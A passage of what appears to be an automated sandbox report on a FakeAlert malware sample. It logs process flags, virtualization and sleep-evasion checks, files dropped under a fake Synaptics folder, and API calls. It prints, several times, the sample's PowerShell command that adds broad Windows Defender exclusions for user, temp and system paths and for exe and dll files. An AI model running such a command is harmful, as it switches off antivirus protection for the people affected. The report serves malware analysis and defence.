                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRDTSC instruction interceptor: First address: 000000000310E555 second address: 000000000310E555 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0604C38FC6h 0x00000006 cmp al, 87h 0x00000008 inc ebp 0x00000009 test edx, ebx 0x0000000b inc ebx 0x0000000c rdtsc
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00435BD4
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep count: 5521 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep count: 695 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep time: -6456360425798339s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7164Thread sleep time: -840000s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep count: 1488 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5521
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 695
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1488
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAPI coverage: 7.5 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAPI coverage: 5.8 %
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00435BD4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00435BD4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXF979.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00426548 GetSystemInfo,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409B1C FindFirstFileA,GetLastError,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040290B FindFirstFileW,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040699E FindFirstFileW,FindClose,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00409B1C FindFirstFileA,GetLastError,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00409B1C FindFirstFileA,GetLastError,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00422BCC VirtualAlloc,LdrInitializeThunk,LdrInitializeThunk,
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeCode function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,GetACP,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,GetACP,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: GetLocaleInfoA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
